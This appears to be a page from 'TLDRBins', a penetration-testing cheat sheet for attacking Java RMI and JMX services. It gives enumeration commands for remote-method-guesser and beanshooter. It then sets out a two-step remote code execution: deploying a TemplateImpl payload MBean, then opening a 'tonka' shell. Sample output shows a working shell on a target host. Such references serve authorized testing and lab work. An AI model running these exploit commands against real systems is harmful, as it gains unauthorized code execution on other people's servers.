TLDRBins TLDRBins / Java RMI

Usage Tips:

  • Click on a keyword to enable inline editing.
  • Click inside a code block to copy (excludes comments).
  • Use the button to view examples.
  • Click outside to collapse all examples.

RMI (Remote Method Invocation)

Enum

java -jar rmg.jar enum <TARGET> <PORT>

Sample Output:
TO-DO

Ref: remote-method-guesser

JMX (Java Management Extensions)

Enum

java -jar beanshooter.jar enum <TARGET> <PORT>

Sample Output:
TO-DO

RCE

# 1. Upload payload
java -jar beanshooter.jar standard <TARGET> <PORT> tonka

Sample Output:
$ java -jar beanshooter.jar standard 10.10.69.227 2222 tonka
[+] Creating a TemplateImpl payload object to abuse StandardMBean
[+]
[+]     Deplyoing MBean: StandardMBean
[+]     MBean with object name de.qtc.beanshooter:standard=5515770682654 was successfully deployed.
[+]
[+]     Caught NullPointerException while invoking the newTransformer action.
[+]     This is expected bahavior and the attack most likely worked :)
[+]
[+]     Removing MBean with ObjectName de.qtc.beanshooter:standard=5515770682654 from the MBeanServer.
[+]     MBean was successfully removed.

# 2. RCE
java -jar beanshooter.jar tonka shell <TARGET> <PORT>

Sample Output:
$ java -jar beanshooter.jar tonka shell 10.10.69.227 2222
[tomcat@10.10.69.227 /]$ id
uid=1001(tomcat) gid=1001(tomcat) groups=1001(tomcat)

Ref: beanshooter